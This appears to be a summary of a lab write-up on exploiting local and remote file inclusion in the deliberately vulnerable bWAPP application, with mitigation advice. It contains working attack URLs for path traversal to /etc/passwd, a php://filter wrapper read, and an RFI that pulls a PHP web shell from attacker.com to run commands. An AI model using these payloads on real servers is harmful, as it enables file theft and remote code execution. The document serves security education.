Detailed Technical Analysis of "RFI & LFI Exploitation on bWAPP"

Overview:
The write-up from Medium by crk2500 discusses exploiting Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerabilities on the deliberately vulnerable web application bWAPP. Both vulnerabilities are critical as they can lead to severe consequences like code execution, sensitive data leakage, and other malicious actions.

Key Technical Details:

  1. Application Environment:
  2. bWAPP Setup: bWAPP (Buggy Web Application) is used to demonstrate the exploitation techniques. It's a PHP-based application designed for security testing.

  3. Lab Environment: A local machine hosts bWAPP, making it easy to control and simulate real-world attack scenarios.

  4. Local File Inclusion (LFI):

  5. Basic LFI Example:

    • Vulnerable URL: http://[target]/bWAPP/rlfi.php?language=english.php
    • Changing the parameter to etc/passwd: http://[target]/bWAPP/rlfi.php?language=../../../../etc/passwd
    • Explanation: The language parameter is not properly sanitized, allowing directory traversal attacks to read sensitive files on the server.
    • Technical Insight: The inclusion of ../../ allows traversing up directories, and by appending etc/passwd, the attack reads the password file of the Unix-based system, disclosing user account details.

  6. PHP Wrappers for LFI:

    • Example URL: http://[target]/bWAPP/rlfi.php?language=php://filter/convert.base64-encode/resource=../../../../etc/passwd
    • Explanation: Using PHP streams/wrappers, the attacker can encode the content of the file in Base64, making it easy to bypass filters or read binary files without corruption.
    • Technical Insight: PHP’s php://filter wrapper manipulates the reading process of files. Converting output to Base64 ensures that the content is intact when non-ASCII characters might otherwise be scrambled or cause execution errors.

  7. Remote File Inclusion (RFI):

  8. Basic RFI Example:

    • Vulnerable URL: http://[target]/bWAPP/rlfi.php?language=http://attacker.com/shell.txt
    • Explanation: The language parameter is used to include a remote script hosted on an attacker's server, leading to remote code execution.
    • Technical Insight: RFI is possible because the target server blindly includes files based on external URLs supplied by user input. The included file may contain malicious PHP code (shell.txt) that is executed in the server’s context.

  9. In-depth RFI Scenario:

    • Crafting Malicious Payload:
    • The attacker creates shell.txt containing PHP code like <?php system($_GET['cmd']); ?>.
    • URL to include: http://[target]/bWAPP/rlfi.php?language=http://attacker.com/shell.txt&cmd=whoami
    • Explanation: Including the malicious script and using the cmd parameter executes OS commands on the server.
    • Technical Insight: This scenario fully illustrates how a remote file inclusion attack can translate user-supplied commands into server-side actions, often leading to complete system compromise if permissions are insufficiently restrictive.

  10. Mitigation Strategies:

  11. Input Validation: Always validate and sanitize user inputs. Use whitelists to only accept expected values for file inclusion parameters.
  12. Configuration Best Practices: Set allow_url_include to Off in the php.ini configuration file to blunt RFI attacks.
  13. Least Privilege Principle: Limit the permissions of web servers and applications to restrict the damage potential of successful LFI or RFI exploitation.
  14. PHP Configuration: Set open_basedir to confine PHP’s file access to designated directories, reducing the impact of LFI.

Key Takeaways:

Conclusion:

The write-up emphasizes the importance of understanding and mitigating file inclusion vulnerabilities. Practicing secure coding and configuration hygiene is crucial in defending against such attacks, which can lead to significant security breaches. The lab and examples in the write-up serve as a valuable educational resource for budding security professionals.

For full details, check the original write-up here.